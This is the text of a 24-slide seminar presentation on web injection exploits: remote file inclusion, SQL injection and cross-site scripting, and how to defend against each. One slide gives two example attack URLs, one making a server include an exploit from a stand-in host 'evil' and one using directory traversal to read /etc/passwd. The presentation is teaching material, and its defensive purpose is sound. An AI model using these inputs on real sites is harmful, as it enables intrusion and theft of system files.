8/8/2019 Master Semminar Injection Exploits
1/24
Web securityWeb security -- Injection exploitsInjection exploits
Karol Stpniewski
8/8/2019 Master Semminar Injection Exploits
2/24
Presentation topicsPresentation topics
What are Injection exploits
Why they are dangerous?
Basic types of Injection exploits
Remote file injection
Cross-site scripting
SQL Injection
Other
Examples of securing application againstexploits
8/8/2019 Master Semminar Injection Exploits
3/24
Injection exploitInjection exploit what's that?what's that? What is Exploit?
Piece of software or sequence of commands,which causes unintended behaviour to occur on
computer software.
Usually based on bugs or other vulnerability whichexist in computer application.
Possible effects of using exploit:
privilege escalation Denial of service
Gaining control of the system
8/8/2019 Master Semminar Injection Exploits
4/24
Injection exploitInjection exploit what's that?what's that? Injection exploit uses some input or data entry feature to
introduce some kind of data or code that subverts theintended operation of the system.
Usually these exploits exploit vulnerabilities resulting frominsufficient data validation on input and so forth.
The way of injecting the code classifies exploits incategories.
1st
place in OWASP TOP10 ranking of Web applicationexploits.
Used to attack IBM, Yahoo, Apple,...
8/8/2019 Master Semminar Injection Exploits
5/24
Remote file inclusionRemote file inclusion allows an attacker to include a remote file usually through a
script on the web server.
most often found on websites based on scripting languages
like PHP, ASP etc.
can lead to
Code execution on the web server
Code execution on the client-side such as
Javascript which can lead to other attacks such ascross site scripting (XSS).
Denial of Service (DoS)
Data Theft/Manipulation
8/8/2019 Master Semminar Injection Exploits
6/24
Remote file inclusionRemote file inclusion -- exampleexampleTrivial example: We want to
include the file based onwhat color user have
chosen in form. We coulduse the followingconstruction: (PHP andHTML code). We give useronly two options, red andblue. Form is passed to
server using GET method.
8/8/2019 Master Semminar Injection Exploits
7/24
Remote file inclusionRemote file inclusion -- exampleexample
If user finds out (what is relatively simple for GET method) howto change possible values, he can provide own file to include,or can even tell server to include its own files, which normally
shouldn't be available outside the server system.
Examples:
/vulnerable.php?COLOR=http://evil/exploit? - injects a remotely hostedfile containing an exploit.
/vulnerable.php?COLOR=../../../../../../../../etc/passwd%00- allows anattacker to read the contents of the passwd file on a UNIX systemdirectory traversal.
%00 is a NULL meta character which removes the .php suffix which is
added in script.
8/8/2019 Master Semminar Injection Exploits
8/24
Remote file inclusionRemote file inclusion RFI is very common exploit for different CMS
and other applications which provide plugin
systems, downloading and uploading manyfiles etc.
Even many commercial cms wherevulnarable for RFI
8/8/2019 Master Semminar Injection Exploits
9/24
Remote file inclusionRemote file inclusion how tohow to
defenddefend Remove instructions which add files which
names are taken directly from variables
use prepared set of possible files (choosingwith conditional instructions).
Read privilleges on server only for filesneeded on website.
On some server systems (e.g. BSD-like) use jails for server filesystem.
8/8/2019 Master Semminar Injection Exploits
10/24
SQL InjectionSQL Injection What's that?
Most popular injection exploit
Every application which uses SQL-baseddatabase might be vulnerable
However, if there is no SQL there is no danger.
Happens when user input is not properly validatedand escaped
8/8/2019 Master Semminar Injection Exploits
11/24
SQL InjectionSQL Injection -- exampleexample
We want to create simple login form. User provides login andpassword, and we check if such user exists in database. However,user provides data which is control instruction for database. User
gets logged in without providing correct password.
8/8/2019 Master Semminar Injection Exploits
12/24
SQL InjectionSQL Injection possible effectspossible effects
What could happen?
Illegal access to application
Access to whole data in database
Denial of Service
Abillity to modify data
Abillity to execute code on server
Extremely dangerous exploit
8/8/2019 Master Semminar Injection Exploits
13/24
How to defend against SQLHow to defend against SQL
InjectionInjection Prepared statements
Seperates data from statement
Statement is compiled, and might be used many times. Before compilation we place marks instead of data
values.
After compilation we bind the data with the statement,replacing marks with data values.
It's not always possible to use such statements (specialtypes of data)
8/8/2019 Master Semminar Injection Exploits
14/24
How to defend against SQLHow to defend against SQL
InjectionInjection Prepared statements
Example
8/8/2019 Master Semminar Injection Exploits
15/24
How to defend against SQLHow to defend against SQL
InjectionInjection Escaping
Every special character in provided data is
replaced with escaping sequence (e.g. ' isreplaced with '' or \' ).
It's still error-prone
Escaping sequences depend on databaseused
It's based on blacklisting special chars,which is not optimal solution
8/8/2019 Master Semminar Injection Exploits
16/24
How to defend against SQLHow to defend against SQL
InjectionInjection Escaping
Example of escaping in PHP code using built-in functionfor MySQL database.
8/8/2019 Master Semminar Injection Exploits
17/24
How to defend against SQLHow to defend against SQL
InjectionInjection Stored procedures
SQL statements are moved from script to database andsaved as procedure
Procedure is invoked with data as parameters, hasdefined output
It's not enough, we still need to separate data fromstatement in procedure
Main rule do not mix data with code
8/8/2019 Master Semminar Injection Exploits
18/24
How to defend against SQLHow to defend against SQL
InjectionInjection Stored procedures
Example of safe stored procedure in MySQL database
Prepared statement is used here as well.
8/8/2019 Master Semminar Injection Exploits
19/24
How to defend against SQLHow to defend against SQL
InjectionInjection Other important things
Validating data
Check if age is a number, city name is a simple string, etc. Filtering bad data e.g. Remove letters from phone number
Executing statements on account with minimal privillagesneeded for that operation
Regular updates of database system Good database project
8/8/2019 Master Semminar Injection Exploits
20/24
CrossCross--site scripting (XSS)site scripting (XSS)
XSS exploit is based on injecting the code into website,which then is displayed by other users.
Web browsers security policies do not allow scripts towork on data other than data coming from the sameserver which script comes from.
When code is injected to the website, it works on thesame data as the website does.
Attacker is able to grab session data, cookies, andother important information
8/8/2019 Master Semminar Injection Exploits
21/24
CrossCross--site scripting (XSS)site scripting (XSS)
exploit scenarios
Internet boards user adds new post,
which includes script with malicious code. Ifcontent of new post is not properlyvalidated, every user who reads post alsoexecutes script, which might steal hiscookies, session data, etc.
Also possible using RFI method
8/8/2019 Master Semminar Injection Exploits
22/24
CrossCross--site scripting (XSS)site scripting (XSS) howhow
to defendto defend Validating and filtering the data
No strange chars are allowed
All control symbols are removed
Escaping HTML tags and JS symbols
Before displaying, website should replacecontrol symbols with entities.
Defending on client side
Block malicious scripts (using NoScript-likeaddons, etc.)
8/8/2019 Master Semminar Injection Exploits
23/24
Other injection exploitsOther injection exploits
Frame injection Only on IE5,6,7
HTTP header injection
E-mail injection might be used toanonymously send e-mails via forms onpublic website
8/8/2019 Master Semminar Injection Exploits
24/24
That's allThank you!